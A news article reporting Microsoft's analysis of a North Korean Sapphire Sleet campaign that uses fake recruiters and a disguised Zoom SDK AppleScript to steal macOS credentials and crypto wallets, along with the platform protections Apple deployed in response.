North Korean criminals set on stealing Apple users’ credentials and cryptocurrency are using a combination of social engineering and a fake Zoom software update to trick people into manually running malware on their own computers, according to Microsoft.
Redmond’s threat intelligence team tracks the Pyongyang-backed crew as Sapphire Sleet (aka APT38). The Lazarus Group offshoot has been in business since at least 2020, and primarily targets the finance sector to steal cryptocurrency wallets and intellectual property related to cryptocurrency trading and blockchain platforms.
These attacks begin with social engineering. The crew creates fake recruiter profiles on social media and networking platforms like LinkedIn and then reaches out to finance professionals with phony job opportunities before scheduling a technical interview – that’s the delivery mechanism for the malware.
And they follow a rash of other social-engineering-enabled intrusions, including one in which North Korea-linked attackers socially engineered an Axios maintainer, compromised his account, and published malicious versions of the open source JavaScript library containing a remote-access trojan.
“Social engineering lets attackers route around hardened perimeters by convincing users to act on their behalf, turning a human into the vulnerability. It’s low-cost, hard to patch, and scales well,” Sherrod DeGrippo, Microsoft global threat intelligence GM, told The Register.
“Users are conditioned to accept remote support interactions like downloading tools, following instructions, clicking prompts,” she added. “Attackers exploit this familiarity to make malicious actions feel routine, lowering victim skepticism at the critical moment of compromise.”
In its latest campaign, Sapphire Sleet sends victims a fake Zoom support meeting invite, and then instructs them to download a file called Zoom SDK Update.scpt. It’s a compiled AppleScript that opens in macOS Script Editor by default and looks like a legitimate Zoom SDK update, beginning with a large comment block of update instructions to make it appear to be a real software update.
Bad Apple(Script) commands
Underneath the decoy content, the script inserts thousands of blank lines to push the malicious logic below the scrollable view of the Script Editor window and reduce the chances of the victim noticing it. First, it launches a command that invokes the legitimate macOS softwareupdate binary – but with an invalid parameter. This essentially does nothing but launch a trusted Apple‑signed process to make the software update look legitimate.
Next, the script executes its malicious payload via curl to fetch a new attacker-controlled AppleScript that launches directly within the Script Editor context and ensures that additional payloads are dynamically downloaded and executed.
“When the user opens the Zoom SDK Update.scpt file, macOS launches the file in Script Editor, allowing Sapphire Sleet to transition from a single lure file to a multi-stage, dynamically fetched payload chain,” Redmond explained in a Thursday report.
“From this single process, the entire attack unfolds through a cascading chain of curl commands, each fetching and executing progressively more complex AppleScript payloads. Each stage uses a distinct user-agent string as a campaign tracking identifier.”
Each curl user agent fetches a different piece of malware that serves its own purpose in the attack chain, from orchestration and backdooring victims’ machines, to reconnaissance and registering the compromised system with Sapphire Sleet’s command‑and‑control (C2) infrastructure, to bypassing macOS TCC protections, and ultimately harvesting credentials and exfiltrating sensitive data – wallets, browser history and other info, keychains, Apple Notes, and Telegram login details.
Each stage of the campaign also abuses native Apple tools or mimics Apple naming conventions to disguise the illicit activity. For example: the host monitoring binary is called com.apple.cli to help mask the 5 MB Mach-O executable with an Apple-style naming convention.
The credential stealer, delivered through an AppleScript payload executed via osascript, drops a malicious macOS application named systemupdate.app that masquerades as a software update utility and, when launched, displays a native macOS password dialog that closely resembles a legitimate system prompt. The dialog prompts the user to enter their password “to complete a software update,” and this allows Sapphire Sleet to obtain valid user credentials, exfiltrating them by using the Telegram Bot API.
Additionally, one of the backdoors used in this campaign – icloudz – is named to mimic a legitimate iCloud‑related artifact, and also uses the macOS NSCreateObjectFileImageFromMemory API to load additional payloads directly into memory.
Microsoft disclosed this campaign to Apple, and the mac maker has since implemented “platform-level protections to help detect and block infrastructure and malware associated with this campaign,” we’re told. Apple did not respond to The Register’s inquiries.
According to Redmond, however, Apple deployed Apple Safe Browsing protections in Safari to detect and block malicious infrastructure associated with this campaign, and also deployed XProtect signatures to detect and block the malware families linked to Sapphire Sleet. MacOS devices receive these signature updates automatically, so no need to do anything from a user perspective.
One thing organizations can do to protect their users and themselves from falling victim to this and other social-engineering campaigns is to educate people about threats originating from LinkedIn and other social media sites, especially unsolicited communications asking users to download software or install virtual meeting tools.
“Users should never run scripts or commands shared through messages, calls, or chats without prior approval from their IT or security teams,” Redmond warns. ®